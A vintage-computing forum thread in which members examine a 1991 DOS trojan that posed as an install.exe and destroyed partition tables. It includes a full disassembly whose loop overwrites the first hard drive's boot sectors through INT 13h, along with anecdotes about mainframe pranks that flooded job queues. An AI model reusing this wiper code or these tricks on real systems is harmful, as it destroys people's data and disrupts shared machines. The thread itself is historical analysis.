• Please review our updated Terms and Rules here

Anybody wanna have a look at an old Trojan?

Stone

10k Member
Joined
Nov 3, 2009
Messages
12,814
Location
South Jersey, USA
Here's the story... I've had this thing lying around since... 1991. I probably should have known better but back then I guess I just didn't. It's an install.exe from something and when it's run it simply deletes the first partition it finds on your HD. I know this because when you run it a second time it deletes the second partition (which, due to the results of the first run is now the first partition). :) It's nasty, quick and to the point. Even though I know what it does (in practice) I don't read machine code so I don't know what the actual instructions are. If anyone is interested in looking at this thing I'm still curious about it as far as it's construction. Once again, it's nasty so I renamed it to avoid the possibility of accidentally executing it. (Stranger things have happened.) So, if you feel like taking a look at it, lemme know and I I'll then let you know how to get a copy of it. (I'll give you a link.) Please, don't PM me, just indicate here, in this thread.
 

krebizfan

Veteran Member
Joined
May 23, 2009
Messages
5,466
Location
Connecticut
I spent enough time around UCLA to be uninterested in anything from USC.

Unfortunately, that is one concept that is far too easy to write, sometimes happening by accident. I would have to check but I think Undocumented DOS came with a utility to find out what functions get called and that would tell you which method the program used to remove partition entries. Always on anti-virus tends to intercept calls to those functions.
 
Last edited:

Trixter

Veteran Member
Joined
Aug 31, 2006
Messages
7,262
Location
Chicagoland, Illinois, USA
I'll bite. Upload it to /incoming at ftp.oldskool.org or just tell me where to pick it up. I can disassemble it and illustrate various points of interest if you like.

If the file is over 5K in size, it is likely compiled in a high-level language and possible full of a lot of boring junk. Most trojans were created by unskilled people. (Virii, on the other hand, usually required some skill.)
 

Stone

10k Member
Joined
Nov 3, 2009
Messages
12,814
Location
South Jersey, USA
It's 2,595 bytes and most of that is nothing but insulting text. :) This was obviously directed at somebody before it got loose in the wild.

This is it:


MZ#   ÿÿ@  € >  û0jr  €

(Lots of text is in this area)

¸ ŽØŽÀ± ´° » µ ¶ ²€ÍþÁ€ù2vê´LÍ!


I'm really suprised the code copied so well. If this doesn't do it I'll send a link to the file itself.
 

Trixter

Veteran Member
Joined
Aug 31, 2006
Messages
7,262
Location
Chicagoland, Illinois, USA
(Said with the greatest restraint and stifled laughter): Please, let me have a link where I can grab the file itself.

Machine code is more than just printable characters, and I need all of them to disassemble things properly.
 

Chuck(G)

25k Member
Joined
Jan 11, 2007
Messages
39,767
Location
Pacific Northwest, USA
Note to Stone:

If you need a good hex viewer that runs on 32-bit Windows, look at something like "V"--you can copy and paste from the file viewer window.
 

Trixter

Veteran Member
Joined
Aug 31, 2006
Messages
7,262
Location
Chicagoland, Illinois, USA
This was very easy to parse. The code follows, but here's the explanation:

There are two messages, one that overwrites the partition table and another embedded in the code. The first message is the lengthy one, the second is the credits where the programmer actually gives his name, oddly. This second message is simply embedded in the code segment, it isn't used for anything.

The main code points to the first message, then writes nine sectors of it to track 0, sector 0, head 0, on the first hard drive. Then it advances the sector and does it again, until 32 loops of this have gone by, then it exits.

The code is sloppy, because it keeps overwriting the previous message every time it advances -- it also means that the first 31 sectors all contain only the first 512 bytes of the message. He also sets AH to something when it's not used for anything except return codes.

Code:
dseg        segment    para public 'DATA'
        assume cs:dseg
HDMessage    db 'Ha you ****in asshole!!! Take this!!!!!!!!!!!!!!!!Heheheheheheheh'
        db 'ehehehhe eheh h ehe he he h eh ehuehe hheeh he hehj ehe he hjejh '
        db 'ejhr ghjeg jhwhwhehehehehehehhehehehehhehehehehehehehashahhahahah'
        db 'ahahahahahahahahhahahahshagdjhdfgkjsgjsghjj ****!WOW MAN I GOT YO'
        db 'U GOOD!Never mess with M.H.You suckDie hard drive DIE!WOW MAN I G'
        db 'OT YOU GOOD!Hehehehehehehehehehehh ehehehehehehehhehehehehheheheh'
        db 'ehehehehashahhahahahahahahahahahahahhahahahshagdjhdfgkjsgjsghjj f'
        db 'uck!WOW MAN I GOT YOU GOOD!WOW MAN I GOT YOU GOOD!Ha you ****in a'
        db 'sshole!!! Take this!!!!!!!!!!!!!!!!Hehehehehehehehehehehhe eheh h'
        db ' ehe he he h eh ehuehe hheeh he hehj ehe he hjejh ejhr ghjeg jhwh'
        db 'whehehehehehehhehehehehhehehehehehehehashahhahahahahahahahahahaha'
        db 'hhahahahshagdjhdfgkjsgjsghjj ****!WOW MAN I GOT YOU GOOD!Never me'
        db 'ss with M.H.You suckDie hard drive DIE!WOW MAN I GOT YOU GOOD!Heh'
        db 'ehehehehehehehehehh ehehehehehehehhehehehehhehehehehehehehashahha'
        db 'hahahahahahahahahahahhahahahshagdjhdfgkjsgjsghjj ****!WOW MAN I G'
        db 'OT YOU GOOD!WOW MAN I GOT YOU GOOD!',0
        align 10h
dseg        ends


; ===========================================================================


; Segment type:    Uninitialized
seg001        segment    byte stack 'STACK'
        assume cs:seg001
        assume es:nothing, ss:nothing, ds:dseg
message        db 'hahehahahahahahaThe',0,'asshole',0,'who',0,'brought',0,'you',0,'thisis'
        db 0,10h,'KEITH',11h,0,0,0,0,0,0,0,0,10h,'BARBATO',11h
        db 3B5h    dup(0)
seg001        ends


; ===========================================================================


; Segment type:    Pure code
seg002        segment    byte public 'CODE'
        assume cs:seg002
        assume es:nothing, ss:seg001, ds:nothing


; =============== S U B    R O U T    I N E =======================================


; Attributes: noreturn


        public start
start        proc near
        mov    ax, seg    dseg
        mov    ds, ax
        assume ds:dseg
        mov    es, ax
        assume es:dseg
        mov    cl, 0


loc_809:                ; CODE XREF: start+1Dj
        mov    ah, 3
        mov    al, 9
        mov    bx, 0
        mov    ch, 0
        mov    dh, 0
        mov    dl, 80h    ; '€'
        int    13h        ; DISK - WRITE SECTORS FROM MEMORY
                    ; AL = number of sectors to write, CH =    track, CL = sector
                    ; DH = head, DL    = drive, ES:BX -> buffer
                    ; Return: CF set on error, AH =    status,    AL = number of sectors written
        inc    cl
        cmp    cl, 32h    ; '2'
        jbe    short loc_809
        mov    ah, 4Ch
        int    21h        ; DOS -    2+ - QUIT WITH EXIT CODE (EXIT)
 

Chuck(G)

25k Member
Joined
Jan 11, 2007
Messages
39,767
Location
Pacific Northwest, USA
Pretty clumsy--and it isn't a virus per se--it has no way to propagate itself. On most 3.5" IDE drives, it'll wipe out the MBR but little else, as most hard disks since about 1990 have a geometry of 63 sectors/track. Your precious data will remain intact--all you need to do to recover is restore the MBR. (You did keep a backup copy of your hard disk MBR on floppy, didn't you? Back then, it was just too easy to wipe out without a trojan.) Not clever at all.

Back in the early 70s, we (and I'm not saying who else) wrote a virus for CDC 6000 SCOPE. The trick was to call RPV (job reprieve) and RSJ (reschedule job), so that the RPV bailout was to reschedule another copy of the job. So the first job would spawn 2 copies of itself, then those would spawn 2 more of each....until the input queue filled up with them.

The poor operator couldn't simply drop the jobs, because they'd come back like the broomsticks in the sorcerer's apprentice. The introductory message when the job started was a dayfile message of "YOU HAVE A VIRUS". The only way out was to push the deadstart button.

The program was probably smaller than the one just shown.
 

Stone

10k Member
Joined
Nov 3, 2009
Messages
12,814
Location
South Jersey, USA
It was issued circa 1991 when lots of us still had MFM drives in our machines. It came as an IBM PC program -- someone replaced the original install.exe with this little goodie.
 

Chuck(G)

25k Member
Joined
Jan 11, 2007
Messages
39,767
Location
Pacific Northwest, USA
One can only hope said prank was for a non-critical system. IPL'ing any mainframe in the middle of a day really throws all the operators off. (snicker)

Oh, tormenting operators was what made life interesting in an otherwise boring day. I think the official solution to the RSJ thing was to rename RSJ as a 1xx PPU program, thereby making it directly inaccessible to user programs, but leaving it useful for the OS.

When SCOPE 3.4 came out (the immediate predecessor to NOS BE), it was decided and approved by design committee that a useful disk I/O command would be "Read list string", in which the stack processor could be presented with a list of RBRs to read as long as the read buffer could be emptied (SCOPE I/O used circular buffering). What harm could you do with a read command, after all?--it would speed up the process of the loader linking up from libraries immensely. Some wise guy constructed a small program that not only emptied the buffer (just set IN=OUT), but kept adding to the list of RBTs, essentially hanging the stack processor (PP assigned to do disk access). Again, deadstart time because the system couldn't even load the overlay to terminate a job.

I remember back in the 60s, some joker wrote a program that ran under DOS/360 that used a CCW with a TIC to cause the 1052 console typewriter ring its bell nonstop--it locked the keyboard as well and tied up the multiplexer channel. That was great, because not only did it cause operator panic, but it was noisy. Add to this that one of the first operators confronted with this one panicked and responded by pulling the "Emergency Stop" switch. (required CE service to get things going again).

Ah, the good old days... :)
 
Top